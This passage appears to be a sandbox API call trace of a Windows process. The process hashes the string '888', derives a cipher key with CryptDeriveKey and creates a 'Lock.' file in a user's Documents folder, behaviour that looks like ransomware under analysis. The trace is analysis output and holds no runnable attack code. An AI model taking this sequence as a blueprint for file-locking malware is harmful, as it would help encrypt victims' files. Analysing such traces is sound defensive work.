cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0222.260] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.260] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.260] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.260] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.260] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.260] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.260] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.260] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0222.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.260] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0222.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.260] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0222.261] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.261] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0222.261] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.261] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.261] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.261] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.261] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.261] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.261] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.261] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.261] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.261] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0222.261] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.261] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0222.261] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.261] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.261] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.261] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.261] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.261] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.261] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.262] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.262] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.262] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0222.262] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.262] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0222.262] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.262] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.262] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0222.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabad0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0222.262] CryptCreateHash (in: hProv=0xa7ba28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0222.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0222.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ea8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0222.262] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0222.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0222.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71de8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0222.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.263] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.263] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.263] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.263] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.263] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.263] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0222.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaba70, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0222.263] CryptHashData (hHash=0x9e1cb8, pbData=0x2a71ea8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0222.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.263] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.263] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.263] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.263] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.263] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.263] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0222.263] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.263] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0222.263] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.264] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0222.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabc20, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0222.264] CryptDeriveKey (in: hProv=0xa7ba28, Algid=0x6601, hBaseData=0x9e1cb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1c38) returned 1 [0222.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.264] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.264] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0222.264] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.264] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0222.264] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0222.264] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0222.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0222.264] CryptDestroyHash (hHash=0x9e1cb8) returned 1 [0222.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.264] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.265] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/zxF6sHlM0JaF" (normalized: "c:\\users\\fd1hvy\\documents\\zxf6shlm0jaf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0222.265] GetLastError () returned 0x5 [0222.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0222.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0222.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0222.266] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0222.266] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0222.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0222.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0222.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0222.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0222.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0222.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0222.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0222.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0222.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0222.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0222.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0222.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0222.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0222.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0222.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0222.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0222.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854bf0 [0222.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0222.267] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0222.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854bf0 | out: hHeap=0x2af0000) returned 1 [0222.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0222.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0222.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x3855010 [0222.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0222.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0222.267] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.zxF6sHlM0JaF" (normalized: "c:\\users\\fd1hvy\\documents\\lock.zxf6shlm0jaf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0222.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70c0 [0222.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0222.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0222.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0222.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0222.268] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0222.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0222.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0222.270] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0222.271] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0222.271] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0222.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0222.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0222.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0222.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0222.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0222.271] RtlAllocateHeap 